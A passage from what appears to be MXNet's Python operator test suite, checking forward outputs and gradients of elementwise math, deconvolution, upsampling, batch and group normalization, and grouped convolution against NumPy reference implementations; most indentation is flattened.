shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.rsqrt(data) + mx.sym.cos(data) + mx.sym.sin(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = 1/ np.sqrt(data_tmp) + np.cos(data_tmp) + np.sin(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * -(1.0 / (2.0 * data_tmp * np.sqrt(data_tmp))) + npout_grad * -1 * np.sin(data_tmp) + npout_grad * np.cos(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_maximum_minimum():
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp2 = np.random.rand(3,4)
data_tmp1[:] = 2
data_tmp2[:] = 3
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,data2) + mx.sym.minimum(data1,data2)
exe_test = test._bind(default_context(), args=[arr_data1,arr_data2], args_grad=[arr_grad1,arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,data_tmp2) + np.minimum(data_tmp1,data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > data_tmp2).astype('float')
mask2 = (data_tmp1 < data_tmp2).astype('float')
npout_grad1 = npout_grad * mask1 + npout_grad * mask2
npout_grad2 = (npout_grad - npout_grad * mask1) + (npout_grad - npout_grad * mask2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def test_maximum_minimum_scalar():
data1 = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp1[:] = 2
arr_data1 = mx.nd.array(data_tmp1)
arr_grad1 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,3) + mx.sym.maximum(9,data1) + mx.sym.minimum(5,data1) + mx.sym.minimum(data1,4)
exe_test = test._bind(default_context(), args=[arr_data1], args_grad=[arr_grad1])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,3) + np.maximum(9,data_tmp1) + np.minimum(5,data_tmp1) + np.minimum(data_tmp1,4)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > 3).astype('float')
mask2 = (9 > data_tmp1).astype('float')
mask3 = (5 < data_tmp1).astype('float')
mask4 = (data_tmp1 < 4).astype('float')
npout_grad1 = npout_grad * mask1 + (npout_grad - npout_grad * mask2) + (npout_grad - npout_grad * mask3) + npout_grad * mask4
assert_almost_equal(arr_grad1, npout_grad1)
def test_abs():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.abs(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = abs(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
    out_grad[:] = 2
npout_grad = out_grad.asnumpy()
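    # d/dx |x| = sign(x), so the expected input gradient is out_grad * sign(x).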
npout_grad = npout_grad * np.sign(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def check_deconvolution_forward_backward(input_shape, num_filter, kernel, stride, pad):
"""configure A: input --> conv --> deconv --> output.
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output, and the same weights between conv
and deconv;
If the input value of forward() and backwrad() is the same, then
the output value of them should also the same;
"""
assert input_shape[1] == num_filter
data = mx.sym.Variable(name="data")
conv = mx.sym.Convolution(
data=data, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
deconv = mx.sym.Deconvolution(
data=conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
input_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
out_grad = input_data
args = {}
args["data"] = input_data
args['conv_weight'] = args['deconv_weight'] = mx.random.normal(0, 1,
(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
args_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = deconv._bind(default_context(), args=args, args_grad=args_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
exe.backward(out_grad)
assert_almost_equal(out, args_grad[0], rtol=1E-3, atol=1e-3)
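    # Re-bind with grad_req="add": gradients should now be accumulated on top of
    # the existing contents of args_grad instead of overwriting them, which the
    # addto check below verifies.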
args_grad_addto_npy = [np.random.normal(size=s) for s in arg_shapes]
args_grad_addto = [mx.nd.array(ele) for ele in args_grad_addto_npy]
exe = deconv._bind(default_context(), args=args, args_grad=args_grad_addto, grad_req="add")
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out + args_grad_addto_npy[0], args_grad_addto[0].asnumpy(), rtol=1e-3, atol=1e-3)
def check_deconvolution_gradient(input_shape, num_filter, pad):
"""configure A: input --> conv --> output.
configure B: input --> deconv --> output
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output;
During backward(), if the input of A equals output of B, and the output
of A equals input of B, then the grad of weight should be the same;
"""
ndim = len(pad)
stride = (1,) * ndim
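    # With stride 1 and kernel = 2*pad + 1, both the convolution and the
    # deconvolution preserve the spatial size of their input.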
kernel = tuple(2 * np.array(pad) + 1)
data_conv = mx.sym.Variable(name="data_conv")
conv = mx.sym.Convolution(
data=data_conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
data_deconv = mx.sym.Variable(name="data_deconv")
deconv = mx.sym.Deconvolution(
data=data_deconv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
conv_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
conv_args = {}
conv_args["data_conv"] = conv_data
conv_args['conv_weight'] = \
mx.random.normal(0, 1,(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
conv_args_grad = [mx.nd.zeros(conv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
exe_conv = conv._bind(default_context(), args=conv_args, args_grad=conv_args_grad)
exe_conv.forward(is_train=True)
conv_out_grad = mx.random.normal(0, 2, exe_conv.outputs[0].shape, ctx=mx.cpu()).copyto(default_context())
exe_conv.backward(conv_out_grad)
deconv_data = conv_out_grad
deconv_args = {}
deconv_args['data_deconv'] = deconv_data
deconv_args['deconv_weight'] = conv_args['conv_weight']
deconv_args_grad = [mx.nd.zeros(deconv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad_npy = [np.random.normal(size=deconv_data.shape),
np.random.normal(size=(num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad = [mx.nd.array(deconv_addto_args_grad_npy[0]),
mx.nd.array(deconv_addto_args_grad_npy[1])]
exe_deconv = deconv._bind(default_context(), args=deconv_args, args_grad=deconv_args_grad)
exe_deconv.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1], deconv_args_grad[1], rtol=1e-3, atol=1e-2)
# Test AddTo
exe_deconv_addto = deconv._bind(default_context(), args=deconv_args,
args_grad=deconv_addto_args_grad,
grad_req="add")
exe_deconv_addto.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv_addto.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy() + deconv_addto_args_grad_npy[1],
deconv_addto_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
def check_deconvolution_target_shape(input_shape, kernel, stride, pad, adj, target_shape=None):
data = mx.sym.Variable(name="data")
if target_shape:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5,
target_shape = target_shape)
else:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5)
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
default_target_size = 8
if target_shape is None:
target_shape = (default_target_size,) * len(kernel)
assert out_shapes[0] == (input_shape[0], 5) + target_shape
@pytest.mark.serial
def test_deconvolution():
# 2D
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
target_shape = (8,8),
pad = (99,99), # will be ignored
adj = (101,101), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
pad = (1,1),
adj = (1,1),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5,5),
num_filter = 1,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28,28),
num_filter = 3,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403, 403),
num_filter = 3,
kernel = (7,7),
stride = (5,5),
pad = (2,2)
)
check_deconvolution_gradient(
input_shape = (1,3,5,5),
num_filter = 3,
pad = (1,1)
)
check_deconvolution_gradient(
input_shape = (5,3,100,100),
num_filter = 3,
pad = (3,3)
)
# 1D
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
target_shape = (8,),
pad = (99,), # will be ignored
adj = (101,), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
pad = (1,),
adj = (1,),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5),
num_filter = 1,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28),
num_filter = 3,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403),
num_filter = 3,
kernel = (7,),
stride = (5,),
pad = (2,)
)
check_deconvolution_gradient(
input_shape = (1,3,5),
num_filter = 3,
pad = (1,)
)
check_deconvolution_gradient(
input_shape = (5,3,100),
num_filter = 3,
pad = (3,)
)
def test_deconvolution_forward_with_bias():
"""Check if deconvolution forward can work well with bias=True
"""
def check_deconvolution_forward_with_bias(shape=(1, 16, 5, 5), num_filter=32, num_group=1, kernel=(3, 3), pad=(1, 1)):
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
input_data = mx.random.uniform(-5, 5, shape, ctx=mx.cpu())
y = mx.sym.Deconvolution(data=x, weight=w, num_filter=num_filter, num_group=num_group, kernel=kernel, no_bias=False, pad=pad)
exe = y._simple_bind(ctx=mx.cpu(), x=shape, grad_req='null')
exe.arg_arrays[0][:] = np.random.normal(size=exe.arg_arrays[0].shape)
exe.arg_arrays[1][:] = np.random.normal(size=exe.arg_arrays[1].shape)
exe.forward(is_train=False)
o = exe.outputs[0]
t = o.asnumpy()
check_deconvolution_forward_with_bias((1, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((32, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((1, 16, 5, 5), 32, 1, (3, 3), (1, 1))
check_deconvolution_forward_with_bias((32, 16, 5, 5), 32, 1, (3, 3), (1, 1))
def check_nearest_upsampling_with_shape(shapes, scale, root_scale):
arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_context()) for i, shape in zip(range(len(shapes)), shapes)}
arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in zip(range(len(shapes)), shapes)}
up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='nearest', scale=root_scale)
exe = up._bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
exe.backward(exe.outputs)
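    # Backward of nearest upsampling sums the incoming gradient over each
    # upsampled block. Since the out-grad passed in is the forward output
    # itself, each input element should come back scaled by the square of its
    # effective upsampling factor (root_scale**2, times scale**(2*k) for the
    # k-th, further-upsampled input), which is what the assertion below checks.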
for k in range(len(shapes)):
name = 'arg_%d'%k
assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
def check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter):
def _init_bilinear(arr, f):
weight = np.zeros(np.prod(arr.shape), dtype='float32')
shape = arr.shape
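        # Standard bilinear-interpolation kernel initialization: f is the
        # upsampling factor, c the center offset, and each weight is the
        # product of 1-D triangle (tent) functions in x and y.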
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(np.prod(shape)):
x = i % shape[3]
y = (i // shape[3]) % shape[2]
weight[i] = (1 - abs(x / f - c)) * (1 - abs(y / f - c))
arr[:] = weight.reshape(shape)
return arr
up = mx.sym.UpSampling(mx.sym.Variable("data"),
mx.sym.Variable('weight'), sample_type='bilinear', scale=root_scale,
num_filter=num_filter, num_args=2)
arg_shapes, out_shapes, _ = up.infer_shape(data=data_shape)
arr = {'data': mx.random.uniform(-5, 5, data_shape, ctx=mx.cpu()).copyto(default_context()),
'weight': mx.nd.array(_init_bilinear(mx.ndarray.empty(arg_shapes[1]).asnumpy(), root_scale))}
arr_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = up._bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(exe.outputs)
target_shape = (data_shape[2] * root_scale, data_shape[3] * root_scale)
assert out.shape == data_shape[:2] + target_shape
def test_nearest_upsampling():
for root_scale in [1,2,3]:
for scale in [1,2,3]:
for num_shape in [1,2,3]:
for base in [1,2,3]:
shapes = [(1,3,base*root_scale*scale**(num_shape-1-i),base*root_scale*scale**(num_shape-1-i)) for i in range(num_shape)]
check_nearest_upsampling_with_shape(shapes, scale, root_scale)
def test_bilinear_upsampling():
rootscale = [2,3]
scales = [1,2,3]
filters = [1,2,3]
bases = [1,2,3]
for params in itertools.product(rootscale, scales, filters, bases):
root_scale, scale, num_filter, base = params
# bilinear upsampling takes only 1 data and 1 weight
# multi input mode is not applicable
dimension = base*root_scale*scale
kernel = 2 * root_scale - root_scale % 2
data_shape = (1, num_filter, dimension, dimension)
weight_shape = (1, num_filter, kernel, kernel)
check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter)
def test_batchnorm_training():
def check_batchnorm_training(stype):
for shape in [(2, 3), (2, 3, 2, 2), (2, 8, 2, 2)]:
data_tmp = np.random.normal(-0.1, 0.1, size=shape)
            s = (shape[1],)
gamma = np.ones(s)
beta = np.ones(s)
gamma[1] = 3
beta[0] = 3
rolling_mean = np.random.uniform(size=s)
rolling_std = np.random.uniform(size=s)
data = mx.symbol.Variable('data', stype=stype)
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
mean_std = [mx.nd.array(rolling_mean).tostype(stype), mx.nd.array(rolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
# Test varying channel axis
dim = len(shape)
for chaxis in range(-dim, dim):
chaxis_true = chaxis
if chaxis < 0:
chaxis_true = dim + chaxis
shapex = shape
channel_count = shapex[chaxis_true]
data_tmp = np.random.normal(-0.1, 0.1, size=shapex)
gamma = np.ones(channel_count)
beta = np.ones(channel_count)
if channel_count > 1:
gamma[1] = 3
beta[0] = 3
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
xrolling_mean = np.random.uniform(size=channel_count)
xrolling_std = np.random.uniform(size=channel_count)
xmean_std = [mx.nd.array(xrolling_mean).tostype(stype),
mx.nd.array(xrolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
check_batchnorm_training('default')
@xfail_when_nonstandard_decimal_separator
@pytest.mark.parametrize('op_name', ['BatchNorm', 'SyncBatchNorm'])
@pytest.mark.parametrize('shape', [(4, 2), (4, 3, 4),
(4, 6, 4, 5), (4, 5, 6, 4, 5)])
@pytest.mark.parametrize('fix_gamma', [False, True])
@pytest.mark.parametrize('cudnn_off', [False, True])
@pytest.mark.parametrize('output_mean_var', [False, True])
def test_batchnorm(op_name, shape, fix_gamma, cudnn_off, output_mean_var):
if op_name == 'BatchNorm':
op = mx.nd.BatchNorm
elif op_name == 'SyncBatchNorm':
op = mx.nd.contrib.SyncBatchNorm
else:
raise ValueError(f'Not supported {op_name}')
momentum = 0.9
epsilon = 1e-5
def _test_batchnorm_impl(axis,
data_grad_req, gamma_grad_req, beta_grad_req):
kwargs = dict(output_mean_var=output_mean_var)
if op_name == 'SyncBatchNorm':
if axis != 1:
return
key = str(op) + str(shape) + str(axis)
kwargs.update(dict(key=key))
if cudnn_off:
return
else:
kwargs.update(dict(axis=axis, cudnn_off=cudnn_off))
nch = shape[axis]
if not fix_gamma:
bn_gamma = mx.nd.random.uniform(shape=(nch,))
bn_gamma.attach_grad(grad_req=gamma_grad_req)
else:
bn_gamma = mx.nd.ones(shape=(nch,))
bn_beta = mx.nd.random.uniform(shape=(nch,))
bn_beta.attach_grad(grad_req=beta_grad_req)
bn_running_mean = mx.nd.zeros(nch)
bn_running_var = mx.nd.ones(nch)
running_mean = mx.nd.zeros(nch)
running_var = mx.nd.ones(nch)
num_iters = 10
expand_shape = [1] * len(shape)
expand_shape[axis] = shape[axis]
data = mx.nd.random.uniform(shape=shape)
data.attach_grad(grad_req=data_grad_req)
adX, adW, adb = 0, 0, 0
is_train = data_grad_req != 'null' or \
(not fix_gamma and gamma_grad_req != 'null') or \
beta_grad_req != 'null'
for _ in range(num_iters):
if data_grad_req != 'add':
data = mx.nd.random.uniform(shape=shape)
data.attach_grad(grad_req=data_grad_req)
ograd = mx.nd.random.uniform(shape=shape)
with mx.autograd.record():
output = op(data, bn_gamma, bn_beta,
bn_running_mean, bn_running_var,
momentum=momentum, eps=epsilon,
fix_gamma=fix_gamma, **kwargs)
if output_mean_var:
output, output_mean, output_std = output
if is_train:
output.backward(ograd)
mx.nd.waitall()
data_mean = data.mean(
axis=axis, exclude=True, keepdims=True)
data_var = (data - data_mean).square().mean(axis=axis,
exclude=True,
keepdims=True)
target_output = (data - data_mean) / \
(data_var + epsilon).sqrt() * \
bn_gamma.reshape(expand_shape) + \
bn_beta.reshape(expand_shape)
# squeeze data_mean and data_var
data_mean_flat = data_mean.squeeze()
data_var_flat = data_var.squeeze()
running_mean = running_mean * momentum + \
data_mean_flat * (1 - momentum)
m = np.prod(shape) / shape[axis]
# cudnn uses m-1 in the denominator of its sample variance calculation, not m
sample_var_adjust = 1.0 if cudnn_off or fix_gamma else m / (m-1)
running_var = running_var * momentum + \
data_var_flat * sample_var_adjust * (1 - momentum)
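            # Reference batch-norm backward, with x_hat = (x - mean) / sqrt(var + eps)
            # and y = gamma * x_hat + beta:
            #   dL/dx_hat = ograd * gamma                                     (dnx)
            #   dL/dvar   = sum(dL/dx_hat * (x - mean)) * -0.5 * (var + eps)**-1.5
            #   dL/dmean  = -sum(dL/dx_hat)/sqrt(var + eps) - 2*dL/dvar*mean(x - mean)
            #   dL/dx     = dL/dx_hat/sqrt(var + eps) + dL/dvar*2*(x - mean)/m + dL/dmean/m
            #   dL/dgamma = sum(ograd * x_hat),  dL/dbeta = sum(ograd)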
W = bn_gamma.reshape(expand_shape)
dnx = ograd * W
xsm = data - data_mean
nd = 1.0 / mx.nd.sqrt(data_var + epsilon)
nx = xsm * nd
dvar = (dnx * xsm).sum(axis=axis, keepdims=True,
exclude=True) * (-0.5) * mx.nd.power(nd, 3)
dmean = -nd * dnx.sum(axis=axis, keepdims=True, exclude=True) - \
dvar * xsm.mean(axis=axis, keepdims=True,
exclude=True) * 2.0
dX = dnx * nd + dvar * xsm * (2.0 / m) + dmean * (1.0 / m)
dW = (ograd * nx).sum(axis=axis, exclude=True)
db = ograd.sum(axis=axis, exclude=True)
adX = dX if data_grad_req != 'add' else adX + dX
adW = dW if gamma_grad_req != 'add' else adW + dW
adb = db if beta_grad_req != 'add' else adb + db
atol, rtol = 5e-2, 5e-2
if output_mean_var:
assert_almost_equal(output_mean.asnumpy(),
data_mean_flat.asnumpy(),
atol=atol, rtol=rtol)
if op != mx.nd.contrib.SyncBatchNorm:
assert_almost_equal(output_std.asnumpy(),
(1.0 / (data_var_flat +
epsilon).sqrt()).asnumpy(),
atol=atol, rtol=rtol)
else:
assert_almost_equal(output_std.asnumpy(),
data_var_flat.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(output.asnumpy(), target_output.asnumpy(),
atol=atol, rtol=rtol)
if is_train:
assert_almost_equal(bn_running_mean.asnumpy(
), running_mean.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(bn_running_var.asnumpy(
), running_var.asnumpy(), atol=atol, rtol=rtol)
if data_grad_req != 'null':
assert_almost_equal(data.grad.asnumpy(),
adX.asnumpy(), atol=atol, rtol=rtol)
if not fix_gamma:
if gamma_grad_req != 'null':
assert_almost_equal(
bn_gamma.grad.asnumpy(), adW.asnumpy(),
atol=atol, rtol=rtol)
else:
assert((bn_gamma.asnumpy() == 1).all())
if beta_grad_req != 'null':
assert_almost_equal(
bn_beta.grad.asnumpy(), adb.asnumpy(), atol=atol, rtol=rtol)
grad_reqs = ['write'] if len(shape) != 4 else ['null', 'write', 'add']
for data_grad_req in grad_reqs:
for gamma_grad_req in grad_reqs:
if fix_gamma and gamma_grad_req != 'null':
continue
for beta_grad_req in grad_reqs:
for axis in range(len(shape)):
_test_batchnorm_impl(axis,
data_grad_req, gamma_grad_req, beta_grad_req)
def test_groupnorm():
acc_types = {'float16': 'float32', 'float32': 'float64', 'float64': 'float64'}
def x_hat_helper(x, num_groups, eps):
dtype = x.dtype
dshape = x.shape
assert len(dshape) == 4
acc_type = acc_types[str(dtype)]
new_shape = (dshape[0], num_groups, int(dshape[1] / num_groups), dshape[2], dshape[3])
new_moments_shape = (dshape[0], num_groups, 1, 1, 1)
data = x.reshape(new_shape)
mean = np.mean(data, axis=(2, 3, 4), keepdims=False, dtype=acc_type).astype(dtype)
std = np.sqrt(np.var(data, axis=(2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype) + eps)
x_hat = (data - mean.reshape(new_moments_shape)) / std.reshape(new_moments_shape)
return x_hat, mean, std
def np_groupnorm(data, gamma, beta, num_groups, eps):
new_param_shape = (1, dshape[1], 1, 1)
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
out = x_hat.reshape(dshape) * gamma.reshape(new_param_shape) + beta.reshape(new_param_shape)
return out, mean, std
def np_groupnorm_grad(ograd, data, gamma, beta, mean, std, num_groups, eps):
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
new_shape = x_hat.shape
dshape = data.shape
dtype = data.dtype
new_moments_shape = (new_shape[0], num_groups, 1, 1, 1)
new_param_shape = (1, dshape[1], 1, 1)
acc_type = acc_types[str(dtype)]
ograd = ograd.reshape(new_shape)
data = data.reshape(new_shape)
gamma = gamma.reshape(new_param_shape)
beta = beta.reshape(new_param_shape)
mean = mean.reshape(new_moments_shape)
std = std.reshape(new_moments_shape)
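        # Reference group-norm backward: beta receives the plain sum of ograd and
        # gamma the sum of x_hat * ograd (both reduced over N, H, W per channel);
        # the data gradient is the whitened ograd with its per-group mean and its
        # projection onto x_hat removed, i.e. the usual normalization backward
        # applied within each group.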
beta_grad = np.sum(ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
gamma_grad = np.sum(x_hat * ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
x_hat_grad = ograd * gamma.reshape(1, num_groups, dshape[1] // num_groups, 1, 1)
ograd_mult = x_hat_grad / std
red_out = np.mean(ograd_mult, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = ograd_mult - red_out
red_out = np.mean(ograd_mult * x_hat, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = data_grad - x_hat * red_out
return data_grad.reshape(dshape), gamma_grad, beta_grad
batch_size = random.randint(1, 8)
num_groups = random.randint(2, 3)
num_channels = random.randint(2, 3) * num_groups
height = random.randint(1, 5)
width = random.randint(1, 5)
dshape = (batch_size, num_channels, height, width)
param_shape = (num_channels,)
temp_shape = (batch_size, num_groups, int(num_channels / num_groups), height, width)
np_data = np.random.uniform(0.2, 1.0, dshape)
np_gamma = np.random.uniform(-1.0, 1.0, param_shape)
np_beta = np.random.uniform(-1.0, 1.0, param_shape)
data_sym = mx.sym.Variable("data")
gamma_sym = mx.sym.Variable("gamma")
beta_sym = mx.sym.Variable("beta")
for dtype in [np.float16, np.float32, np.float64]:
eps = 1e-2 if dtype == np.float16 else 1e-5
mx_data = mx.nd.array(np_data, dtype=dtype)
mx_gamma = mx.nd.array(np_gamma, dtype=dtype)
mx_beta = mx.nd.array(np_beta, dtype=dtype)
np_out, np_mean, np_std = np_groupnorm(np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
num_groups=num_groups,
eps=eps)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=True)
check_symbolic_forward(mx_sym, [mx_data, mx_gamma, mx_beta], [np_out, np_mean, np_std],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-3 if dtype == np.float16 else 1e-4, dtype=dtype)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=False)
np_ograd = np.random.uniform(-1.0, 1.0, dshape).astype(dtype)
np_data_grad, np_gamma_grad, np_beta_grad = np_groupnorm_grad(np_ograd,
np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
np_mean, np_std,
num_groups, eps)
check_symbolic_backward(mx_sym, [mx_data, mx_gamma, mx_beta], [mx.nd.array(np_ograd, dtype=np_ograd.dtype)],
[np_data_grad, np_gamma_grad, np_beta_grad],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-2 if dtype == np.float16 else 1e-4, dtype=dtype)
def test_convolution_grouping():
for dim in [1, 2, 3]:
num_filter = 4
for num_group in [1, 2]:
kernel = (3,) * dim
shape = (1, 4) + (9,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group, kernel=kernel)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel)
for i in range(num_group)])
exe1 = y1._simple_bind(default_context(), x=shape)
exe2 = y2._simple_bind(default_context(), x=shape, w=(num_filter, shape[1]//num_group) + kernel, b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.float32(np.random.normal(size=arr1.shape))
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@pytest.mark.skip(reason="Flaky test https://github.com/apache/incubator-mxnet/issues/14052")
def test_depthwise_convolution():
for dim in [1,2]:
